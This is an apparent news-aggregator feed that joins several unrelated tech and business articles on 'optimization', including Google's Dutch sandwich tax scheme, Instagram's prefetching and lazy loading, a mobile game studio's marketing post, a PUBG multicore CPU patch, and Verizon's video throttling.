Google’s tax optimization scheme moved 7 percent more money in 2016 than it did during the previous year, according to a Dutch regulator. The scheme saved the US tech giant at least $ 3.7 billion in taxes.

The company uses subsidiaries in Ireland, Singapore and the Netherlands to shield most of its international profits from taxation, reports Bloomberg. Advertising revenue is generated by its Irish and Singapore branches, and then funneled through the Dutch branch, which has no employees. It is then sent to a Bermuda mailbox called Google Ireland Holdings Unlimited. The scheme, which is legal, has been given monikers like the “Double Irish” and “Dutch sandwich” by financiers.

In 2016, Google moved €15.9 billion ($ 19.2 billion) from the Netherlands to its Bermuda shell, according to company filings with the Dutch Chamber of Commerce, which were published on Tuesday and reported by local media. The company saved $ 3.7 billion in tax that it avoided paying in Ireland and Singapore as a result.

In 2015, the same tax optimization scheme moved €14.9 billion ($ 15.5 billion) to the Bermuda entity and saved Google $ 3.6 billion. The Irish government closed the loophole that allowed such an arrangement two years ago, but Google will be able to use it until 2020.

The US company is estimated to have paid an effective tax rate of 19.3 percent in 2016, Bloomberg said, which is achieved by shielding international profit from taxation. Google had $ 60.7 billion in tax-free foreign earnings held overseas at the end of 2016.

The tax reform passed last month in the US gives companies like Google an incentive to repatriate foreign earnings by paying a once-off 15.5 percent tax rate. It also imposes a 13.1 percent tax on some international patent royalties, which are essential for tax schemes like the one used by Google.

One issue Instagram faces as it continues to try and expand its userbase is how to reach folks who are in parts of the world without great internet access. That’s why the Facebook-owned company has turned to a New York-based team of engineers to help streamline and optimize its app for better compatibility with network environments that don’t involve omnipresent high-speed access.

A key issue with building systems that improve performance is that it can be hard for software engineering teams to see when users are being turned off of an app. Lola Priego, an engineer on the team in New York that’s responsible for maintaining performance in the Instagram app, said in an interview with VentureBeat that people will stop using an app if it doesn’t perform well, so it can be hard to tell when those performance issues are affecting user experience.

“Performance is really difficult to identify through metrics,” Priego said. “If the performance of the app isn’t good, you won’t use it.”

While users in markets like the U.S. will often have strong network connections and high-performance phones with recent versions of their respective operating systems, that’s not necessarily the case in other countries. The sorts of practices that work well enough in other markets don’t translate as well across borders.

Priego and her team developed a system that lets Instagram’s app pre-fetch content while on a strong network connection, so that customers can see photos from their friends that have been uploaded to the social network between the last time they closed the app and when they’re expected to next open it.

The system works by trying to predict when people will re-open the app, and then fetching the latest data just in time for folks to see the most up-to-date stuff. That way, if they’re unable to connect to a network (or the networks they’re on limits how much bandwidth they can use), it’s still possible for them to get up-to-date images.

All of that is baked into a framework that Instagram engineers can use to enable prefetching for the features they’re working on within the application.

In addition to that system, another part of the performance team developed a system for the Instagram Android app that makes it easier for developers to split each function within the app into different modules that can then be loaded independently of one another. That helps improve a key metric: startup time.

Previously, Instagram’s Android app had different features that relied on one another to get going, which is something the company has been working to do away with, according to Julian Krzeminski, a senior software engineer at the company. Now, the different components of the app are decoupled from one another.

Because the app doesn’t need to load all of its components at once, it’s possible for people to start browsing Instagram faster, while the system uses “lazy loading” to pull in additional modules roughly when it makes sense. Assuming it all goes according to plan, people should actually see improved performance.

Instagram open sourced its tools for lazy loading, which means that Java developers writing Android apps can start taking them for a spin when contemplating how to optimize their applications’ performance. Those tools aren’t necessarily right for every developer, since the require a certain degree of technical skill and understanding of how Android works, but for companies that are looking to expand their reach or improve their applications’ performance, this could be a boon.

As tech companies continue to seek new avenues of growth, this sort of international compatibility work will only become more important.

How TreasureHunt found mobile gaming gold with research and optimization https://briefnews.eu/how-treasurehunt-found-mobile-gaming-gold-with-research-and-optimization/ https://briefnews.eu/how-treasurehunt-found-mobile-gaming-gold-with-research-and-optimization/#respond Tue, 15 Aug 2017 22:51:55 +0000 http://briefnews.eu/how-treasurehunt-found-mobile-gaming-gold-with-research-and-optimization/

The mobile game market is more competitive than ever — an average of 792 games are submitted to the iTunes App Store each day. Mobile game makers need a plan stronger than “hope.” At TreasureHunt, our Berlin-based interactive entertainment company, we focused heavily on pre-production surveys, integrated marketing with production from the get-go, and optimized slowly to find the sweet spot for our new game Pet Paradise, a bubble shooter mobile game featuring a pet collecting and island discovery meta-game. The results have been remarkable.

We created a game that our target audience wanted, but was not yet available. Essentially, we found a niche with no competition and big reach potential. Launched last month, and featured on both the Apple and Android App Stores, we’ve reached an over 2 percent click through rate with an overall average click to install rate of 68 percent across all social media, a day one retention rate of over 50 percent across all installs, platforms and marketing channels, and enviable engagement rates. Here’s how we did it.

Pre-production surveys

Before we even started designing Pet Paradise, we had a hypothesis that the bubble shooter (like Puzzle Bobble) audience and the match-3 audience overlapped. We surveyed audiences interested in both bubble shooters and casual meta-games in order to make sure we were building a game that was both desired and unique. After all, innovation is useless if no one actually wants it. Our hypothesis was demonstrated correct by our research, so we built a unique meta-game, which was not currently offered with other bubble shooters. We believe that combined with our high production value and art style set Pet Paradise apart from other games on the market.

Our iOS players average 15 minutes and 10 seconds over three sessions per day in the app and Android users 16 minutes and 17 seconds over 3.2 sessions per day, which is what you typically see in higher engagement strategy and action genres (Benchmark data here and here). Our Daily Active User group (those who play 6-7 days per week) play an average 4.8 sessions with 27 minutes and 26 seconds game time daily).

Integrating marketing with production since day one

We integrated marketing with production since day one of making Pet Paradise, so that we have been able to not only optimize targeted marketing, but also the early game metrics resulting from optimizing the game for that target group. We started by running three vastly different types of bubble shooter ads to players of both bubble shooters and match-3 games, and based on click and conversion data, we were able to accurately chose a game direction that would resonate with players.

Since each ad dealt with a different unique selling proposition, it allowed us to be more flexible in terms of marketing. For instance, if a bigger studio bought up all the ad space in the bubble genre, we were able to run ads that focused more on the pet collection aspect of our game.

Production value and art

Although it sounds like a no-brainer, our high production values are key to our success. Whether you make shoes, chairs or games people want nice looking things, especially if they go to your product to be entertained. Spend the time on this and you’ll be rewarded. While you won’t make additional revenue from a good looking game, you’ll save on marketing costs and people will be more inclined to stick around because quality creates trust. As our game is based on an adorable collection of 82 animals (and more planned) it was important for us to nail our characters. We quickly found that our audience preferred more rounded and simple animals animals as they provided more of a huggable feel, and that we could keep the animals’ bodies universal and focus on the snouts and tails for maximum impact.

Gender was another focus when developing our art. Typically, men make up only 20 percent of the bubble shooter audience. We wanted to create a game that was more accessible to both genders and didn’t fall into the pink princess stereotype. Our gender split is now 30 percent men and 70 percent women.

Optimization learnings

We took a considerable amount of time during soft launch to identify and build personas that would work well on a global scale, and our Media Services teams focused on what worked and what didn’t in other bubble shooter marketing campaigns. When testing our visual ad formats we were surprised to learn our audience didn’t respond to us pushing the meta-game in our ads. Our audience shows up for the Bubble Shooter, but stay for the pets and islands which reflects the strong retention we’re seeing due to the meta-game.

Playtesting was also a critical part of our development process, as key performance indicators can only tell you so much. By working with PlaytestCloud, we were able to get invaluable feedback, like discovering that the close buttons on our pop-ups needed to be bigger because a lot of our users have longer nails. You can’t find out meaningful insights like that from just data.

We’re off to a good start with Pet Paradise, and we’re excited about the road ahead. We’ve learned sticking to the basics is critical: give people something they want, but don’t yet have. Build, measure, and learn has been a winning strategy in developing a successful mobile game.

PlayerUnknown’s Battlegrounds gets 6 core-plus CPU optimization https://briefnews.eu/playerunknowns-battlegrounds-gets-6-core-plus-cpu-optimization/ https://briefnews.eu/playerunknowns-battlegrounds-gets-6-core-plus-cpu-optimization/#respond Thu, 10 Aug 2017 05:35:28 +0000 http://briefnews.eu/playerunknowns-battlegrounds-gets-6-core-plus-cpu-optimization/

PlayerUnknown’s Battlegrounds is getting an update today that includes optimization for CPUs that have 6 or more compute cores. That patch, which also fixes a handful of bugs in the last-person-standing shooter from developer Bluehole, hits the test servers today. The studio says that if it’s stable, it will roll out the update to its live servers by Thursday.

Getting support for multicore CPUs could make a difference for a game like PlayerUnknown’s Battlegrounds due to its persistent nature. It has up to 100 players all running around a map at the same time, and that puts a lot of processing on the CPU as opposed to the graphics card. We’ll have to see if this new optimization makes a difference, but it is something that theoretically could improve performance for anyone rocking a chip with more than 4 cores.

This is an update for both AMD and Intel CPUs.

Those chip manufacturers have shifted from creating smaller, more efficient CPUs to focusing instead on adding more compute cores and multithreading. AMD is launching its Threadripper chips that include up to 16 cores, and Intel has a series of Core-X CPUs that have as many as 18 cores. Most games don’t take full advantage of that many cores, so — and you’ll probably still hear this for the foreseeable future — these chips are overkill for PC gaming. But if PlayerUnknown’s Battlegrounds sees a significant improvement, getting a 6-core Intel Core i7-7800X for $ 400 potentially makes a lot more sense.

Although, if you don’t give a damn about sense, you could always hop on this $ 2,000 18-core Intel Core i9-7980XE Extreme Edition Processor. If you’re going for overkill, you should really go all the way.

The PC Gaming channel is presented by Intel®‘s Game Dev program.

If there is one thing I hate, it’s optimization. Computers don’t actually understand what they are optimizing. And that creates problems for everything from bicycles to nuclear fusion.

The process goes something like this: you have a mathematical model of a bicycle. You want your bike to perform better, but there are so many things that can be changed, so you can’t imagine finding the best configuration on your own. So you write a script. The script will vary the configuration of the bicycle and evaluate whether it is improved. After many iterations, you have the perfect bike, right?

No, you don’t. What you didn’t imagine was that the computer would remove the seat. Or that it would place, for no apparent reason, a third wheel between the (now removed) saddle and handlebars. Even worse, the stupid machine has got the chain passing through a bit of solid steel.

Verizon Wireless customers this week noticed that Netflix’s speed test tool appears to be capped at 10Mbps, raising fears that the carrier is throttling video streaming on its mobile network.

When contacted by Ars this morning, Verizon acknowledged using a new video optimization system but said it is part of a temporary test and that it did not affect the actual quality of video. The video optimization appears to apply both to unlimited and limited mobile plans.

But some YouTube users are reporting degraded video, saying that using a VPN service can bypass the Verizon throttling. The Federal Communications Commission generally allows mobile carriers to limit video quality as long as the limitations are imposed equally across different video services despite net neutrality rules that outlaw throttling. The net neutrality rules have exceptions for network management.
